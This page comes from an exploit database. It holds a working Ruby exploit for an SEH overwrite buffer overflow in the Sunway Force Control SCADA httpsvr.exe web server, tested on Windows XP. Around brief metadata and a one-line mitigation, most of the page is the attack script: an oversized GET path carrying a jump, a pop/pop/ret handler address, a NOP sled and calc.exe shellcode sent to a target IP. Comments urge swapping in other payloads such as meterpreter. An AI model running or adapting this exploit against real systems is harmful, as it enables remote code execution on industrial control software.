Sunway Force Control SCADA httpsvr.exe Exploit

vendor:

Sunway Force Control SCADA httpsvr.exe

by:

Canberk BOLAT

7.8

CVSS

HIGH

SEH Overwrite

119

CWE

Product Name: Sunway Force Control SCADA httpsvr.exe

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:sunwayland:sunway_force_control_scada_httpsvr.exe

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP0 English

2020

Sunway Force Control SCADA httpsvr.exe Exploit

Sunway Force Control SCADA httpsvr.exe is vulnerable to a SEH Overwrite vulnerability. This exploit was tested on Windows XP SP0 English and probably will work on XP SP3 if a none-safeseh dll for p/p/r pointer is found. The exploit uses a windows/exec CMD=calc.exe shellcode and a NOP sled to achieve code execution.

Mitigation:

Upgrade to the latest version of Sunway Force Control SCADA httpsvr.exe

Source

Exploit-DB raw data:

# Sunway Force Control SCADA httpsvr.exe Exploit
# Exploitable with simple SEH Overwrite technique
# Tested on XP SP0 English
# Probably will work on XP SP3 if you find none-safeseh dll for p/p/r pointer
# Canberk BOLAT | @cnbrkbolat
# cbolat.blogspot.com 
# for fun ;)
#
# notez: other payloads not working stable because of memory region's status.
# i tested meterpreter/bind_tcp and others some of them not work because of
# trying to write to unwritable memory regions.
# if you write some asm for changing access protection of memory region
# it can be work. try it, do it!
#
# Vendor: http://www.sunwayland.com.cn/

def send(packet)
	begin
		sock = TCPSocket.new(@ip, @port)
		sock.write(packet)
	rescue Exception => e
		return false
	else
		resp = sock.recv(1024) 
		sock.close
		
		return true
	end
end

@ip = ARGV[0]
@port = 80

# windows/exec CMD=calc.exe
shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
			"\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +
			"\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +
			"\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +
			"\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +
			"\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +
			"\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +
			"\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +
			"\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +
			"\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +
			"\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +
			"\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +
			"\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +
			"\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +
			"\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +
			"\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +
			"\x82\xc5\x65"
			
payload = "H" * 1599
payload << "\xeb\x06\x90\x90" # Pointer to Next SE Handler
payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r
payload << "\x90" * 40
payload << shellcode
payload << "\x90" * (4058 - shellcode.length)

pack = "GET /#{payload} HTTP/1.1\r\n"
pack << "Host: http://#{@ip}:#{@port}\r\n\r\n"

puts "packet sended." if send(pack)